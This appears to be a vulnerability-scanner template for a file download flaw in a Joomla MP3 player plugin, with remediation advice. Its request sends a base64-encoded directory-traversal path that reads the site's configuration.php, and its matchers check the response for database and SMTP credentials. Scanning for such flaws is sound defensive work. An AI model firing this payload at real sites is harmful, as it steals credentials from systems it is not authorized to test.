id: Joomla-LFD-s5_media_player
info:
  name: Joomla Shape 5 MP3 Player 2.0 Plugin LFD
  author:
  - 折跃
  description: |-
    Arbitrary file download vulnerability in Joomla! Shape 5 MP3 Player component
    Joomla! is an open source content management system (CMS).

    There is a file download vulnerability in the Joomla! Shape 5 MP3 Player 2.0 component. An attacker can exploit this vulnerability to read arbitrary files.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'$user')
    - contains(body,'$password')
    - contains(body,'$smtphost')
  path:
  - '{{BaseURL}}/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
